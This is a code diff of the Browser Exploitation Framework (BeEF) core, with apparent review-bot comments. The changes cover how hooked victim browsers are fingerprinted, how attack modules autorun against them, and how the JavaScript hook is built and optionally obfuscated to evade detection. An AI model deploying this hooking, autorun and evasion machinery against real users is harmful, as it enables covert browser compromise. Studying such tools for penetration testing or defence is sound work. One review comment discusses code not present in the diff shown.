5061f96b1..ed35791d6 100644 --- a/core/main/distributed_engine/models/rules.rb +++ b/core/main/distributed_engine/models/rules.rb 
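Review bot: `OS_WEBOS_UA_STR = 'webos.png'` assigns an image file name to a user-agent string constant, and no `OS_WEBOS_IMG` is defined, so this looks like two lines merged into one. Presumably the intent was `OS_WEBOS_UA_STR = 'webOS'` plus `OS_WEBOS_IMG = 'webos.png'`; the exact UA string should be confirmed against the client-side detection code. match_os has no webOS arm either. The new `when /ios/, /iphone/, /ipad/, /ipod/` arm sits below `when /os x/, /osx/, /mac/`, so a name containing both would be reported as Mac; if such input is possible, move the iOS arm above the Mac arm.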
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb index dfb3b8040..79c086330 100644 --- a/core/main/handlers/browserdetails.rb +++ b/core/main/handlers/browserdetails.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core 
@@ -34,6 +24,9 @@ module BeEF end def setup() + print_debug "[INIT] Processing Browser Details..." + config = BeEF::Core::Configuration.instance + # validate hook session value session_id = get_param(@data, 'beefhook') (self.err_msg "session id is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(session_id) @@ -118,6 +111,14 @@ module BeEF self.err_msg "Invalid operating system name returned from the hook browser's initial connection." end + # get and store the hardware name + hw_name = get_param(@data['results'], 'Hardware') + if BeEF::Filters.is_valid_hwname?(hw_name) + BD.set(session_id, 'Hardware', hw_name) + else + self.err_msg "Invalid hardware name returned from the hook browser's initial connection." + end + # get and store the date date_stamp = get_param(@data['results'], 'DateStamp') if BeEF::Filters.is_valid_date_stamp?(date_stamp) @@ -222,6 +223,14 @@ module BeEF self.err_msg "Invalid value for HasFlash returned from the hook browser's initial connection." end + # get and store the yes|no value for HasPhonegap + has_phonegap = get_param(@data['results'], 'HasPhonegap') + if BeEF::Filters.is_valid_yes_no?(has_phonegap) + BD.set(session_id, 'HasPhonegap', has_phonegap) + else + self.err_msg "Invalid value for HasPhonegap returned from the hook browser's initial connection." + end + # get and store the yes|no value for HasGoogleGears has_googlegears = get_param(@data['results'], 'HasGoogleGears') if BeEF::Filters.is_valid_yes_no?(has_googlegears) 
@@ -263,23 +272,29 @@ module BeEF end # log a few info of newly hooked zombie in the console - print_info "New Hooked Browser [ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]" + print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]" # Call autorun modules - autorun = [] - BeEF::Core::Configuration.instance.get('beef.module').each { |k, v| - if v.has_key?('autorun') and v['autorun'] == true - if BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name}) == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING - BeEF::Module.execute(k, session_id) - autorun.push(k) - else - print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser #{zombie.ip}" + if config.get('beef.autorun.enable') + autorun = [] + BeEF::Core::Configuration.instance.get('beef.module').each { |k, v| + if v.has_key?('autorun') and v['autorun'] == true + target_status = BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name}) + if target_status == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING + BeEF::Module.execute(k, session_id) + autorun.push(k) + elsif target_status == BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY and config.get('beef.autorun.allow_user_notify') + BeEF::Module.execute(k, session_id) + autorun.push(k) + else + print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]" + end end + } + if autorun.length > 0 + print_info "Autorun executed[#{autorun.join(', ')}] against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]" end - } - if autorun.length > 0 - print_info 
"Autorun executed: #{autorun.join(', ')} against Hooked browser #{zombie.ip}" end end diff --git a/core/main/handlers/commands.rb b/core/main/handlers/commands.rb index b96f45c6f..86f6e2685 100644 --- a/core/main/handlers/commands.rb +++ b/core/main/handlers/commands.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/core/main/handlers/hookedbrowsers.rb b/core/main/handlers/hookedbrowsers.rb index a5450ac91..0e004465a 100644 --- a/core/main/handlers/hookedbrowsers.rb +++ b/core/main/handlers/hookedbrowsers.rb 
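Review bot: The two arms that call `BeEF::Module.execute(k, session_id)` and `autorun.push(k)` are identical. The `else` arm also logs "Autorun attempted to execute unsupported module" when the module's status is VERIFIED_USER_NOTIFY and it was skipped only because `beef.autorun.allow_user_notify` is off. Folding the test into one condition, `if target_status == VERIFIED_WORKING or (target_status == VERIFIED_USER_NOTIFY and config.get('beef.autorun.allow_user_notify'))` (constants qualified as in the hunk), removes the duplication, and the skipped-by-policy case can then get its own debug message. The loop still calls `BeEF::Core::Configuration.instance.get('beef.module')` although `config` appears to be in scope from the earlier hunk in this file. The enclosing method starts outside this hunk.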
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb index 92473876d..e36fedd7c 100644 --- a/core/main/handlers/modules/beefjs.rb +++ b/core/main/handlers/modules/beefjs.rb 
@@ -1,136 +1,159 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF -module Core -module Handlers -module Modules + module Core + module Handlers + module Modules - # @note Purpose: avoid rewriting several times the same code. - module BeEFJS + # @note Purpose: avoid rewriting several times the same code. + module BeEFJS - # Builds the default beefjs library (all default components of the library). 
- # @param [Object] req_host The request object - def build_beefjs!(req_host) - config = BeEF::Core::Configuration.instance - # @note set up values required to construct beefjs - beefjs = '' - # @note location of sub files - beefjs_path = "#{$root_dir}/core/main/client/" - # @note we load websocket library only if ws server is enabled in config.yalm - # check in init.js - if config.get("beef.http.websocket.enable") - js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js) - else - js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js) - end + # Builds the default beefjs library (all default components of the library). 
+ # @param [Object] req_host The request object + def build_beefjs!(req_host) + config = BeEF::Core::Configuration.instance + # @note set up values required to construct beefjs + beef_js = '' + # @note location of sub files + beef_js_path = "#{$root_dir}/core/main/client/" - # @note construct the beefjs string from file(s) - js_sub_files.each {|js_sub_file_name| - js_sub_file_abs_path = beefjs_path + js_sub_file_name - beefjs << (File.read(js_sub_file_abs_path) + "\n\n") - } + # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated + ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js) - # @note create the config for the hooked browser session + # @note BeEF libraries: need Eruby evaluation and obfuscation + beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js) + # @note Load websocket library only if WS server is enabled in config.yaml + if config.get("beef.http.websocket.enable") == true + beef_js_sub_files << "websocket.js" + end - hook_session_name = config.get('beef.http.hook_session_name') - hook_session_config = BeEF::Core::Server.instance.to_h + # @note antisnatchor: leave timeout.js as the last one! + beef_js_sub_files << "timeout.js" - # @note if http_host="0.0.0.0" in config ini, use the host requested by client - if hook_session_config['beef_host'].eql? "0.0.0.0" - hook_session_config['beef_host'] = req_host - hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host) - end + ext_js_to_obfuscate = '' + ext_js_to_not_obfuscate = '' - # @note if http_port <> public_port in config ini, use the public_port - unless hook_session_config['beef_public_port'].nil? 
- if hook_session_config['beef_port'] != hook_session_config['beef_public_port'] - hook_session_config['beef_port'] = hook_session_config['beef_public_port'] - hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port']) - if hook_session_config['beef_public_port'] == '443' - hook_session_config['beef_url'].sub!(/http:/, 'https:') + # @note If Evasion is enabled, the final ext_js string will be ext_js_to_obfuscate + ext_js_to_not_obfuscate + # @note If Evasion is disabled, the final ext_js will be just ext_js_to_not_obfuscate + ext_js_sub_files.each{ |ext_js_sub_file| + if config.get("beef.extension.evasion.enable") + if config.get("beef.extension.evasion.exclude_core_js").include?(ext_js_sub_file) + print_debug "Excluding #{ext_js_sub_file} from core files obfuscation list" + # do not obfuscate the file + ext_js_sub_file_path = beef_js_path + ext_js_sub_file + ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n") + else + ext_js_sub_file_path = beef_js_path + ext_js_sub_file + ext_js_to_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n") + end + else + # Evasion is not enabled, do not obfuscate anything + ext_js_sub_file_path = beef_js_path + ext_js_sub_file + ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n") + end + } + + # @note construct the beef_js string from file(s) + beef_js_sub_files.each { |beef_js_sub_file| + beef_js_sub_file_path = beef_js_path + beef_js_sub_file + beef_js << (File.read(beef_js_sub_file_path) + "\n\n") + } + + # @note create the config for the hooked browser session + hook_session_config = BeEF::Core::Server.instance.to_h + + # @note if http_host="0.0.0.0" in config ini, use the host requested by client + if hook_session_config['beef_host'].eql? 
"0.0.0.0" + hook_session_config['beef_host'] = req_host + hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host) + end + + # @note set the XHR-polling timeout + hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout") + + # @note if http_port <> public_port in config ini, use the public_port + unless hook_session_config['beef_public_port'].nil? + if hook_session_config['beef_port'] != hook_session_config['beef_public_port'] + hook_session_config['beef_port'] = hook_session_config['beef_public_port'] + hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port']) + if hook_session_config['beef_public_port'] == '443' + hook_session_config['beef_url'].sub!(/http:/, 'https:') + end + end + end + + # @note Set some WebSocket properties + if config.get("beef.http.websocket.enable") + hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure") + hook_session_config['websocket_port'] = config.get("beef.http.websocket.port") + hook_session_config['ws_poll_timeout'] = config.get("beef.http.websocket.ws_poll_timeout") + hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port") + end + + # @note populate place holders in the beef_js string and set the response body + eruby = Erubis::FastEruby.new(beef_js) + @hook = eruby.evaluate(hook_session_config) + + if config.get("beef.extension.evasion.enable") + evasion = BeEF::Extension::Evasion::Evasion.instance + @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook) + else + @final_hook = ext_js_to_not_obfuscate + @hook + end + + # @note Return the final hook to be sent to the browser + @body << @final_hook + + end + + # Finds the path to js components + # @param [String] component Name of component + # @return [String|Boolean] Returns false if path was not found, otherwise returns component path + def 
find_beefjs_component_path(component) + component_path = component + component_path.gsub!(/beef./, '') + component_path.gsub!(/\./, '/') + component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js" + + return false if not File.exists? component_path + + component_path + end + + # Builds missing beefjs components. + # @param [Array] beefjs_components An array of component names + def build_missing_beefjs_components(beefjs_components) + # @note verifies that @beef_js_cmps is not nil to avoid bugs + @beef_js_cmps = '' if @beef_js_cmps.nil? + + if beefjs_components.is_a? String + beefjs_components_path = find_beefjs_component_path(beefjs_components) + raise "Invalid component: could not build the beefjs file" if not beefjs_components_path + beefjs_components = {beefjs_components => beefjs_components_path} + end + + beefjs_components.keys.each { |k| + next if @beef_js_cmps.include? beefjs_components[k] + + # @note path to the component + component_path = beefjs_components[k] + + # @note we output the component to the hooked browser + @body << File.read(component_path)+"\n\n" + + # @note finally we add the component to the list of components already generated so it does not get generated numerous times. + if @beef_js_cmps.eql? 
'' + @beef_js_cmps = component_path + else + @beef_js_cmps += ",#{component_path}" + end + } end end end - - if config.get("beef.http.websocket.enable") - hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure") - hook_session_config['websocket_port'] = config.get("beef.http.websocket.port") - hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer") - end - - # @note populate place holders in the beefjs string and set the response body - eruby = Erubis::FastEruby.new(beefjs) - @hook = eruby.evaluate(hook_session_config) - - if config.get("beef.extension.evasion.enable") - evasion = BeEF::Extension::Evasion::Evasion.instance - @hook = evasion.add_bootstrapper + evasion.obfuscate(@hook) - end - - @body << @hook - end - - # Finds the path to js components - # @param [String] component Name of component - # @return [String|Boolean] Returns false if path was not found, otherwise returns component path - def find_beefjs_component_path(component) - component_path = component - component_path.gsub!(/beef./, '') - component_path.gsub!(/\./, '/') - component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js" - - return false if not File.exists? component_path - - component_path - end - - # Builds missing beefjs components. - # @param [Array] beefjs_components An array of component names - def build_missing_beefjs_components(beefjs_components) - # @note verifies that @beef_js_cmps is not nil to avoid bugs - @beef_js_cmps = '' if @beef_js_cmps.nil? - - if beefjs_components.is_a? String - beefjs_components_path = find_beefjs_component_path(beefjs_components) - raise "Invalid component: could not build the beefjs file" if not beefjs_components_path - beefjs_components = {beefjs_components => beefjs_components_path} - end - - beefjs_components.keys.each {|k| - next if @beef_js_cmps.include? 
beefjs_components[k] - - # @note path to the component - component_path = beefjs_components[k] - - # @note we output the component to the hooked browser - @body << File.read(component_path)+"\n\n" - - # @note finally we add the component to the list of components already generated so it does not get generated numerous times. - if @beef_js_cmps.eql? '' - @beef_js_cmps = component_path - else - @beef_js_cmps += ",#{component_path}" - end - } - end - end - -end -end -end end diff --git a/core/main/handlers/modules/command.rb b/core/main/handlers/modules/command.rb index 9d7646614..0df1cbdc9 100644 --- a/core/main/handlers/modules/command.rb +++ b/core/main/handlers/modules/command.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core 
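Review bot: find_beefjs_component_path rewrites its argument in place (`gsub!`, `replace`), so the caller's string silently becomes a file path. The pattern `/beef./` has an unescaped dot and no anchor, so it strips every "beef" plus the following character rather than only the leading namespace. Because the result is passed to `File.read` and appended to the response body in build_missing_beefjs_components, it is worth working on a copy and checking the shape of the name first: `return false unless component =~ /\A[\w.]+\z/`, then `component_path = "#{$root_dir}/core/main/client/#{component.sub(/\Abeef\./, '').gsub('.', '/')}.js"`. The caller only uses the returned path, so this stays compatible. Separately, `config.get("beef.extension.evasion.exclude_core_js").include?` in build_beefjs! will raise if that key is absent from the configuration; a `|| []` fallback would make that case explicit.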
@@ -61,19 +51,11 @@ module BeEF #todo antisnatchor: remove this gsub crap adding some hook packing. if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session) #content = command_module.output.gsub('// - #// Copyright 2012 Wade Alcorn wade@bindshell.net #// - #// Licensed under the Apache License, Version 2.0 (the "License"); - #// you may not use this file except in compliance with the License. - #// You may obtain a copy of the License at + #// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + #// Browser Exploitation Framework (BeEF) - http://beefproject.com + #// See the file 'doc/COPYING' for copying permission #// - #// http://www.apache.org/licenses/LICENSE-2.0 - #// - #// Unless required by applicable law or agreed to in writing, software - #// distributed under the License is distributed on an "AS IS" BASIS, - #// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - #// See the License for the specific language governing permissions and - #// limitations under the License. #//', "") ws.send(@output, hooked_browser.session) else @@ -82,7 +64,7 @@ module BeEF # @note prints the event to the console if BeEF::Settings.console? name = command_module.friendlyname || kclass - print_info "Hooked browser #{hooked_browser.ip} has been sent instructions from command module '#{name}'" + print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has been sent instructions from command module [id:#{command.id}, name:'#{name}']" end # @note flag that the command has been sent to the hooked browser diff --git a/core/main/logger.rb b/core/main/logger.rb index f9e128d77..5486be58c 100644 --- a/core/main/logger.rb +++ b/core/main/logger.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF @@ -24,6 +14,10 @@ module Core # Constructor def initialize @logs = BeEF::Core::Models::Log + @config = BeEF::Core::Configuration.instance + + # if notifications are enabled create a new instance + @notifications = BeEF::Extension::Notifications::Notifications unless @config.get('beef.extension.notifications.enable') == false end # Registers a new event in the logs @@ -34,6 +28,9 @@ module Core def register(from, event, hb = 0) # type conversion to enforce standards hb = hb.to_i + + # get time now + time_now = Time.now # arguments type checking raise Exception::TypeError, '"from" needs to be a string' if not from.string? @@ -41,7 +38,12 @@ module Core raise Exception::TypeError, '"Hooked Browser ID" needs to be an integer' if not hb.integer? # logging the new event into the database - @logs.new(:type => "#{from}", :event => "#{event}", :date => Time.now, :hooked_browser_id => hb).save + @logs.new(:type => "#{from}", :event => "#{event}", :date => time_now, :hooked_browser_id => hb).save + + # if notifications are enabled send the info there too + if @notifications + @notifications.new(from, event, time_now, hb) + end # return true 
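Review bot: In `initialize`, the guard `unless @config.get('beef.extension.notifications.enable') == false` enables notifications whenever the key holds anything other than a literal `false`, which presumably includes a missing key, so logged events are forwarded to the notifications extension by default. An explicit opt-in is safer: `@notifications = BeEF::Extension::Notifications::Notifications if @config.get('beef.extension.notifications.enable') == true`. In the `register` hunk, `@notifications.new(from, event, time_now, hb)` runs after the log row is saved and is not rescued, so a failing notifier would presumably make `register` raise instead of returning `true`. Wrapping that call in `begin`/`rescue` and reporting the error would keep logging independent of delivery. Both method bodies extend beyond the hunks shown.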
diff --git a/core/main/migration.rb b/core/main/migration.rb index e9b553fc4..973ea0229 100644 --- a/core/main/migration.rb +++ b/core/main/migration.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/models/browserdetails.rb b/core/main/models/browserdetails.rb index 0cd114c75..020da0e06 100644 --- a/core/main/models/browserdetails.rb +++ b/core/main/models/browserdetails.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core 
@@ -62,7 +52,7 @@ module Models browserdetails end - + # # Returns the icon representing the browser type the # hooked browser is using (i.e. Firefox, Internet Explorer) @@ -94,9 +84,10 @@ module Models return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR return BeEF::Core::Constants::Os::OS_OPENBSD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_OPENBSD_UA_STR - return BeEF::Core::Constants::Os::OS_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR - return BeEF::Core::Constants::Os::OS_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR - return BeEF::Core::Constants::Os::OS_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR + return BeEF::Core::Constants::Os::OS_WEBOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WEBOS_UA_STR + return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR + return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR + return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR 
@@ -105,6 +96,33 @@ module Models BeEF::Core::Constants::Os::OS_UNKNOWN_IMG end + # + # Returns the icon representing the hardware the + # zombie is running on (i.e. iPhone, BlackBerry) + # + def self.hw_icon(session_id) + + ua_string = get(session_id, 'BrowserReportedName') + + return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil? + + return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR + return BeEF::Core::Constants::Hardware::HW_ZUNE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ZUNE_UA_STR + return BeEF::Core::Constants::Hardware::HW_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_BLACKBERRY_UA_STR + return BeEF::Core::Constants::Hardware::HW_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPHONE_UA_STR + return BeEF::Core::Constants::Hardware::HW_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPAD_UA_STR + return BeEF::Core::Constants::Hardware::HW_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPOD_UA_STR + return BeEF::Core::Constants::Hardware::HW_KINDLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_KINDLE_UA_STR + return BeEF::Core::Constants::Hardware::HW_NOKIA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_NOKIA_UA_STR + return BeEF::Core::Constants::Hardware::HW_MOTOROLA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_MOTOROLA_UA_STR + return BeEF::Core::Constants::Hardware::HW_HTC_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_HTC_UA_STR + return BeEF::Core::Constants::Hardware::HW_GOOGLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_GOOGLE_UA_STR + return BeEF::Core::Constants::Hardware::HW_ERICSSON_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ERICSSON_UA_STR + + BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG + + end + end end 
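Review bot: `hw_icon` is missing the `@param`/`@return` tags used elsewhere in this code base, and its comment does not say that matching is first-hit-wins on a string reported by the browser. The order of the `return … if ua_string.include?` lines is therefore part of the behaviour, and the value is client-controlled, so it is only a display hint. I would add `# @param [String] session_id session of the hooked browser` and `# @return the first HW_*_IMG constant whose UA substring matches, HW_UNKNOWN_IMG otherwise`, plus `# @note order matters: the first matching substring wins; the input is supplied by the browser`. The header comment also says "zombie" where the rest of the file says "hooked browser".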
diff --git a/core/main/models/command.rb b/core/main/models/command.rb index c4f8751e4..bc408b22f 100644 --- a/core/main/models/command.rb +++ b/core/main/models/command.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF @@ -65,11 +55,11 @@ module Models command.save # @note log that the result was returned - BeEF::Core::Logger.instance.register('Command', "Hooked browser #{hooked_browser.ip} has executed instructions from command module '#{command_friendly_name}'", hooked_browser_id) + BeEF::Core::Logger.instance.register('Command', "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']", hooked_browser_id) # @note prints the event into the console if BeEF::Settings.console? - print_info "Hooked browser #{hooked_browser.ip} has executed instructions from command module '#{command_friendly_name}'" + print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']" end end diff --git a/core/main/models/commandmodule.rb b/core/main/models/commandmodule.rb index 9ade6f12e..11100aaa4 100644 
--- a/core/main/models/commandmodule.rb
+++ b/core/main/models/commandmodule.rb
